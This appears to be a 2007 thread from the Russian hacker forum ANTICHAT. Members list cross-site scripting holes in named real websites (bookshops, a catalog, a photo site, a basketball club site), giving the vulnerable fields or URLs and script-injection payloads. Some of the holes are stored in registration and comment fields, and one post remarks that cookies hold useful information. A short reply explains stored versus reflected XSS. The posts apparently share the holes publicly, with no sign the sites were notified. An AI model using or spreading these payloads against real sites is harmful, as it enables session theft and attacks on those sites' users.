HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.04.2007, 09:11
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
С нами: 10245582

Репутация: 137
По умолчанию

http://ismart.ee/
Интернет магазин по продаже книг. Искал где купить "Красный Лондон", нашел XSS : )

При регистарации (
Код:
http://ismart.ee/Books.dll/login?next=index
)
уязвимы поля:
1. E-mail; - вписываем
Код:
qwe@qwe.ru"><script>alert(/xss/)</script>
2. Ваше имя. - вписаваем
Код:
<script>alert(/xss/)</script>
Далее можно изменить приветствие на
Код:
<script>alert(/xss/)</script>
, тоже работает.

Все заказы просматриваются вручную кстати

И напоследок пассивная XSS, хотя это и не так интересно :
Код:
http://ismart.ee/Books.dll/find?fulltextfind=1&fastfind=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
 
Ответить с цитированием

  #2  
Старый 30.04.2007, 12:04
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

forum.xakep.ru

Запостил сюда тк не понял какой у них тип форума.
На форуме прицепляем файл тхт с содержанием:
"><script>alert()</script>
и открываем его в опере, именно в опере не через блокнот!!! но млин касяк в том что у меня срабатывает через раз))) В куках много полезной информации.
на ие не тестил, он у меня глючит).
 
Ответить с цитированием

  #3  
Старый 22.04.2007, 14:26
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами: 10555586

Репутация: 726


По умолчанию

http://www.booka.ru/

Вставить в поле Поиск

Код:
"><script>alert()</script>
http://www.oplachu.ru/tov226182.html

Вставить в поле Ваш комментарий

Код:
"><script>alert()</script>
http://catalog.kgbi.ru/
http://catalog.designatelie.ru


Вставить в поле Поиска

Код:
"><script>alert()</script>

Последний раз редактировалось _GaLs_; 22.04.2007 в 14:42..
 
Ответить с цитированием

  #4  
Старый 09.05.2007, 11:38
R0chez
Новичок
Регистрация: 22.01.2007
Сообщений: 7
С нами: 10158218

Репутация: 2
По умолчанию

Цитата:
Сообщение от _GaLs_  
http://www.booka.ru/
Вставить в поле Поиск
Код:
"><script>alert()</script>
или в томже поле
Код:
</title><script>alert('xss')</script>
и от меня парочка багов )
Код:
http://www.hiidlane.ee/index.php?moodul=3&q="><script>alert(/xss/)</script>
Код:
http://www.turundusinfo.ee/?id=55&search="><script>alert('xss')</script>&search_src=all
 
Ответить с цитированием

  #5  
Старый 09.05.2007, 12:01
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

Вы можете отличить пассивную от активной?
 
Ответить с цитированием

  #6  
Старый 09.05.2007, 12:11
R0chez
Новичок
Регистрация: 22.01.2007
Сообщений: 7
С нами: 10158218

Репутация: 2
По умолчанию

Цитата:
Сообщение от freddi  
Вы можете отличить пассивную от активной?
Нет. В чом разница ?
 
Ответить с цитированием

  #7  
Старый 12.05.2007, 00:38
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами: 10153766

Репутация: 2565
По умолчанию

Цитата:
Сообщение от R0chez  
Нет. В чом разница ?
Активная XSS (сохраненная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных одним пользователем, сохраненных в системе и доступных для вывода другим пользователям системы.

Т.е. в общем актив это когда уязвимость сохраняется в системе и выдается всем пользователем зашедшим на страницу с уязвимым параметром.

Пассивная XSS (переданная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу.

Пассив в общем когда подсовывается ссылка пользователю, содержащая скрипт переданный в уязвимом параметре. Сработает один раз когда пользователь перейдет по специально сформированной ссылке, если же он перейдет на сайт по обычной ссылке, то ничего не произойдет.
 
Ответить с цитированием

  #8  
Старый 22.04.2007, 14:44
[dword]
Участник форума
Регистрация: 11.04.2007
Сообщений: 103
С нами: 10043772

Репутация: 273
По умолчанию

Цитата:
http://www.booka.ru/

Вставить в поле Поиск

Код:

"><script>alert()</script>
Gals, это же пассивная xss.

Сайт: http://www.photo-cult.com/
Путь: http://www.photo-cult.com/showpic.php?rate&id=187916
Уязвимое поле: Коментар

Код:
"><script>alert()</script>
 
Ответить с цитированием

Xss на сайте ЦСКА
  #9  
Старый 27.04.2007, 22:48
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами: 10555586

Репутация: 726


По умолчанию Xss на сайте ЦСКА

Сайт http://www.cskabasket.com/


Постим коммент
Код:
<script>alert ();</script>
 
Ответить с цитированием

  #10  
Старый 28.04.2007, 16:04
Morph
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
С нами: 11442626

Репутация: 429


По умолчанию

http://www.yandex.ru/cgi-bin/test-robots?host=morpheg.narod.ru
Хек или не хек?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.